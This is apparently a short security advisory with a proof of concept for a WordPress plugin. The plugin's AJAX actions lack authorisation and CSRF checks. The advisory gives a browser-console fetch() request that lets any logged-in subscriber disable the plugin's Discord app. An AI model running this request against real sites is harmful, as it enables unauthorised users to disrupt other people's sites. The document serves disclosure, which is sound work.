The plugin does not have authorisation and CSRF in some of its AJAX actions, allowing any logged in users, such as subscriber to call them, and disable the app for example
Run the below command in the developer console of the web browser while being on the blog as any user, such as subscriber
fetch("/wp-admin/admin-ajax.php", {
"headers": {
"content-type": "application/x-www-form-urlencoded",
},
"method": "POST",
"body": 'action=mo_discord_disable_app&app_name=test',
"credentials": "include"
}).then(response => response.text())
.then(data => console.log(data));